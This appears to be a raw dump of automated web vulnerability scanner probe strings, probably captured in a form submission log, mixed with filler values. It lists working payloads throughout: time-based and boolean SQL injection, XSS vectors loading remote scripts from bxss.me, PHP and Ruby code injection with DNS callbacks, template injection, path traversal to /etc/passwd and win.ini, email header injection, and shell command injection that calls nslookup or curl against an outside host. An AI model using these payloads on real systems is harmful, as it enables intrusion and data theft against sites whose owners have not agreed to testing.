'.gethostbyname(lc('hitrc'.'ticlsifkda11a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(75).chr(118).chr(72).'
!(()&&!|*|*|
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
".gethostbyname(lc("hitmq"."hqncbwxh13cf6.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(65).chr(122).chr(78)."
1
1
1
1
1
1
1
1
'"
1
)
1
1
1
1
1
1
1
1
1
1
1
1
'.gethostbyname(lc('hitfb'.'xsmupirk5e0c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(70).chr(103).chr(89).'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
xfs.bxss.me
1
1
1
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1
1
1
1
1
1
1
1
1
to@example.com>%0d%0abcc:009247.60685-3568.60685.51c6f.19899.2@bxss.me
1
1
1
1
1
1
1
"+response.write(9415135*9238467)+"
1
1
1
'+'A'.concat(70-3).concat(22*4).concat(106).concat(78).concat(115).concat(81)+(require'socket'
Socket.gethostbyname('hitbh'+'hrvipjel64662.bxss.me.')[3].to_s)+'
1
1
1%0abcc:009247.60685-3567.60685.51c6f.19899.2@bxss.me
1
1
1
1
1
1
1
to@example.com>%0d%0abcc:009247.60685-3566.60685.51c6f.19899.2@bxss.me
1
1
1
1
1
1
1
1
1%0abcc:009247.60685-3565.60685.51c6f.19899.2@bxss.me
1
1
"+"A".concat(70-3).concat(22*4).concat(103).concat(76).concat(99).concat(72)+(require"socket"
Socket.gethostbyname("hitkg"+"ymulwwdqb81e7.bxss.me.")[3].to_s)+"
1
1
1
1
1
1
1
1
1
1
1
1
'+'A'.concat(70-3).concat(22*4).concat(103).concat(75).concat(106).concat(89)+(require'socket'
Socket.gethostbyname('hitra'+'jpxgsccc49f44.bxss.me.')[3].to_s)+'
"+response.write(9444196*9012399)+"
1
1
"+"A".concat(70-3).concat(22*4).concat(97).concat(79).concat(97).concat(90)+(require"socket"
Socket.gethostbyname("hitef"+"rvdrpzig702d3.bxss.me.")[3].to_s)+"
1
1
1
1
1
1
1
1
'+response.write(9444196*9012399)+'
1
bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
response.write(9444196*9012399)
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
1
1
bxss.me/t/xss.html?%00
1
1
1
1
1&n994757=v955820
1
1
1
1
1&n909352=v986887
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
1
1
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
1
1
1
zOR1QvAb
1
1
Z6DDi61M
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bxss.me
555
c:/windows/win.ini
555
/etc/shells
555
555
555
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
Http://bxss.me/t/fit.txt
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
'.print(md5(31337)).'
555
555
555
${@print(md5(31337))}\
555
555
${@print(md5(31337))}
555
555
";print(md5(31337));$a="
555
555
';print(md5(31337));$a='
';print(md5(31337));$a='
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
./555
555
555
555
../555
555
555
555
555
555
555
555
555
555
file:///etc/passwd
file:///etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
${@print(md5(31337))}\
555
555
555
555
${@print(md5(31337))}
555
555
555
555
555
555
";print(md5(31337));$a="
bxss.me
555
';print(md5(31337));$a='
c:/windows/win.ini
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
/etc/shells
555
".gethostbyname(lc("hitia"."wzocqolc8c935.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(82).chr(112).chr(80)."
555
http://bxss.me/t/fit.txt%3F.jpg
555
'.gethostbyname(lc('hitvt'.'cilophrp3df58.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(120).chr(78).'
'.gethostbyname(lc('hitvt'.'cilophrp3df58.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(120).chr(78).'
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
555
./555
555
555
555
../555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(104).concat(79)+(require'socket'
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(112).concat(90).concat(99).concat(70)+(require"socket"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitxk"."syykthpt29816.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(70).chr(112).chr(68)."
555
'.gethostbyname(lc('hitwq'.'qnucxssc94372.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(84).chr(97).chr(71).'
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(111).concat(68).concat(111).concat(78)+(require'socket'
Socket.gethostbyname('hitvt'+'garwgkpg9d71d.bxss.me.')[3].to_s)+'
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(82).concat(113).concat(75)+(require"socket"
Socket.gethostbyname("hitsr"+"mqgrlxsz0d269.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
1
1<aK6lKk2<
1<img sRc='http://attacker-9810/log.php?
1<alaxPfe x=9845>
1<ifRAme sRc=9336.com></IfRamE>
1<WRYONS>M80KV[!+!]</WRYONS>
1OVXHX
<InvalidTag >LUn6(9477)</ScRiPt>
1}body{zzz:Expre/**/SSion(LUn6(9295))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=LUn6(9624)>
�<img zzz onmouseover=LUn6(91041) //�>
1<ScRiPt>LUn6(9466)</sCripT>
1\u003CScRiPt\LUn6(9494)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%4C%55%6E%36%289002%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9836)>
1<img src=xyz OnErRor=LUn6(9510)>
1<img src=//xss.bxss.me/t/dot.gif onload=LUn6(9070)>
1<body onload=LUn6(9383)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9368'>
1<isindex type=image src=1 onerror=LUn6(9274)>
1<svg
� onload=LUn6(9044);>
1<InvalidTag
>LUn6(9681)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9063></ScRiPt>
1<InvalidTag
>LUn6(9396)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4C%55%6E%36%28%39%34%39%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>LUn6(9902)</script>9902
1<InvalidTag>LUn6(9875)</script>
1<WXOX9B>WARPI[!+!]</WXOX9B>
1<InvalidTag >LUn6(9799)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx8994%C0%BEz1%C0%BCz2a%90bcxhjl8994
bfg5229%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5229
19900058
'"()&%<zzz><InvalidTag >LUn6(9623)</ScRiPt>
1'"()&%<zzz><InvalidTag >LUn6(9565)</ScRiPt>
1<ax4wahb<
1<img sRc='http://attacker-9147/log.php?
1<akTKKET x=9242>
1<ifRAme sRc=9706.com></IfRamE>
1<WYDGMR>EKPZR[!+!]</WYDGMR>
1kskPC
<InvalidTag >SF5R(9155)</ScRiPt>
1}body{zzz:Expre/**/SSion(SF5R(9004))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=SF5R(9077)>
�<img zzz onmouseover=SF5R(96131) //�>
1<ScRiPt>SF5R(9781)</sCripT>
1\u003CScRiPt\SF5R(9821)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%53%46%35%52%289746%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9109)>
1<img src=xyz OnErRor=SF5R(9951)>
1<img src=//xss.bxss.me/t/dot.gif onload=SF5R(9324)>
1<body onload=SF5R(9727)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9331'>
1<isindex type=image src=1 onerror=SF5R(9821)>
1<svg
� onload=SF5R(9116);>
1<InvalidTag
>SF5R(9514)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9431></ScRiPt>
1<InvalidTag
>SF5R(9792)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%46%35%52%28%39%35%31%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>SF5R(9834)</script>9834
1<InvalidTag>SF5R(9822)</script>
1<WEEM7B>IJR0B[!+!]</WEEM7B>
1<InvalidTag >SF5R(9527)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx9929%C0%BEz1%C0%BCz2a%90bcxhjl9929
bfg4772%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4772
19534002
'"()&%<zzz><InvalidTag >SF5R(9759)</ScRiPt>
1'"()&%<zzz><InvalidTag >SF5R(9730)</ScRiPt>
555
@@nW2J4
����%2527%2522\'\"
'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1J1Xpw3CA')) OR 915=(SELECT 915 FROM PG_SLEEP(15))--
1BrfD09tf') OR 531=(SELECT 531 FROM PG_SLEEP(15))--
1-1)) OR 808=(SELECT 808 FROM PG_SLEEP(15))--
1-1) OR 276=(SELECT 276 FROM PG_SLEEP(15))--
1-1 OR 636=(SELECT 636 FROM PG_SLEEP(15))--
1lpGodsHD')); waitfor delay '0:0:15' --
1DxSRekSX'); waitfor delay '0:0:15' --
12broRdvv'; waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1-1)); waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1*if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+645-645) --
-1" OR 3*2<(0+5+645-645) --
-1" OR 3+645-645-1=0+0+0+1 --
-1" OR 2+645-645-1=0+0+0+1 --
-1' OR 3*2>(0+5+793-793) or '5tKVXwNu'='
-1' OR 3*2<(0+5+793-793) or '5tKVXwNu'='
-1' OR 3+793-793-1=0+0+0+1 or '5tKVXwNu'='
-1' OR 2+793-793-1=0+0+0+1 or '5tKVXwNu'='
-1' OR 3*2>(0+5+627-627) --
-1' OR 3*2<(0+5+627-627) --
-1' OR 3+627-627-1=0+0+0+1 --
-1' OR 2+627-627-1=0+0+0+1 --
-1 OR 3*2>(0+5+378-378)
-1 OR 3*2<(0+5+378-378)
-1 OR 3+378-378-1=0+0+0+1
-1 OR 2+378-378-1=0+0+0+1
-1 OR 3*2>(0+5+563-563) --
-1 OR 3*2<(0+5+563-563) --
-1 OR 3+563-563-1=0+0+0+1 --
-1 OR 2+563-563-1=0+0+0+1 --
1
1
@@4yjbF
����%2527%2522\'\"
'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1C9CjMQCK')) OR 918=(SELECT 918 FROM PG_SLEEP(15))--
14x9lTv41') OR 605=(SELECT 605 FROM PG_SLEEP(15))--
1pUHn40nM' OR 903=(SELECT 903 FROM PG_SLEEP(15))--
1-1)) OR 951=(SELECT 951 FROM PG_SLEEP(15))--
1-1) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
1-1 OR 164=(SELECT 164 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
1cyRG0N31')); waitfor delay '0:0:15' --
555
bxss.me
c:/windows/win.ini
555
555
/etc/shells
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
Http://bxss.me/t/fit.txt
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
./555
'+'A'.concat(70-3).concat(22*4).concat(110).concat(87).concat(112).concat(83)+(require'socket'
Socket.gethostbyname('hittf'+'kfkncaec176ee.bxss.me.')[3].to_s)+'
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
../555
"+"A".concat(70-3).concat(22*4).concat(113).concat(74).concat(101).concat(67)+(require"socket"
Socket.gethostbyname("hiteg"+"jepcayuyf8972.bxss.me.")[3].to_s)+"
555
555
555
555
file:///etc/passwd
555
555
1XTY8GIRF'); waitfor delay '0:0:15' --
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1EpRg85nH'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1-1 waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
${@print(md5(31337))}\
555
${@print(md5(31337))}
555
1-1)); waitfor delay '0:0:15' --
";print(md5(31337));$a="
555
555
';print(md5(31337));$a='
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitqt"."vmktexdx859cd.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(89).chr(104).chr(84)."
555
'.gethostbyname(lc('hituw'.'uvzryvja887b7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(80).chr(121).chr(79).'
555
555
555
555
1-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1*if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+113-113) --
-1" OR 3*2<(0+5+113-113) --
-1" OR 3+113-113-1=0+0+0+1 --
-1" OR 2+113-113-1=0+0+0+1 --
-1' OR 3*2>(0+5+328-328) or 'bU6k0E95'='
-1' OR 3*2<(0+5+328-328) or 'bU6k0E95'='
-1' OR 3+328-328-1=0+0+0+1 or 'bU6k0E95'='
-1' OR 2+328-328-1=0+0+0+1 or 'bU6k0E95'='
-1' OR 3*2>(0+5+996-996) --
-1' OR 3*2<(0+5+996-996) --
-1' OR 3+996-996-1=0+0+0+1 --
-1' OR 2+996-996-1=0+0+0+1 --
-1 OR 3*2>(0+5+942-942)
-1 OR 3*2<(0+5+942-942)
-1 OR 3+942-942-1=0+0+0+1
-1 OR 2+942-942-1=0+0+0+1
-1 OR 3*2>(0+5+182-182) --
-1 OR 3*2<(0+5+182-182) --
-1 OR 3+182-182-1=0+0+0+1 --
-1 OR 2+182-182-1=0+0+0+1 --
1
1
555
555
1<apToRoP<
1<img sRc='http://attacker-9417/log.php?
1<aBFspuq x=9536>
1<ifRAme sRc=9389.com></IfRamE>
1<WFFIXX>6YYHG[!+!]</WFFIXX>
1GlwkY
<InvalidTag >KhE4(9605)</ScRiPt>
1}body{zzz:Expre/**/SSion(KhE4(9085))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=KhE4(9987)>
�<img zzz onmouseover=KhE4(99101) //�>
1<ScRiPt>KhE4(9041)</sCripT>
1\u003CScRiPt\KhE4(9884)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%4B%68%45%34%289909%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9566)>
1<img src=xyz OnErRor=KhE4(9724)>
1<img src=//xss.bxss.me/t/dot.gif onload=KhE4(9589)>
1<body onload=KhE4(9748)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9344'>
1<isindex type=image src=1 onerror=KhE4(9390)>
1<svg
� onload=KhE4(9497);>
1<InvalidTag
>KhE4(9359)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9717></ScRiPt>
1<InvalidTag
>KhE4(9673)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4B%68%45%34%28%39%30%31%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>KhE4(9601)</script>9601
1<InvalidTag>KhE4(9460)</script>
1<WS8H26>QQBNJ[!+!]</WS8H26>
1<InvalidTag >KhE4(9499)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
19267843
1
'"()&%<zzz><InvalidTag >do6b(9301)</ScRiPt>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1'"()&%<zzz><InvalidTag >do6b(9851)</ScRiPt>
1
<%={{={@{#{${dfb}}%>
/\xfs.bxss.me?hkbakels.com.hk
bfgx10364%C0%BEz1%C0%BCz2a%90bcxhjl10364
//xfs.bxss.me?hkbakels.com.hk
bfg3063%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3063
xfs.bxss.me?hkbakels.com.hk
19370031
http://xfs.bxss.me?hkbakels.com.hk
'"()&%<zzz><InvalidTag >KhE4(9135)</ScRiPt>
954604
xfs.bxss.me
1'"()&%<zzz><InvalidTag >KhE4(9853)</ScRiPt>
<!--
'"
WEB-INF\web.xml
WEB-INF/web.xml
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
;(nslookup -q=cname hitruooggzdcoca1df.bxss.me||curl hitruooggzdcoca1df.bxss.me)|(nslookup -q=cname hitruooggzdcoca1df.bxss.me||curl hitruooggzdcoca1df.bxss.me)&(nslookup -q=cname hitruooggzdcoca1df.bxss.me||curl hitruooggzdcoca1df.bxss.me)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
`(nslookup -q=cname hitrestjizzfa7790b.bxss.me||curl hitrestjizzfa7790b.bxss.me)`
|(nslookup -q=cname hittcpnyyokqd9ffed.bxss.me||curl hittcpnyyokqd9ffed.bxss.me)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
&(nslookup -q=cname hitdqhuunuypt83b0a.bxss.me||curl hitdqhuunuypt83b0a.bxss.me)&'\"`0&(nslookup -q=cname hitdqhuunuypt83b0a.bxss.me||curl hitdqhuunuypt83b0a.bxss.me)&`'
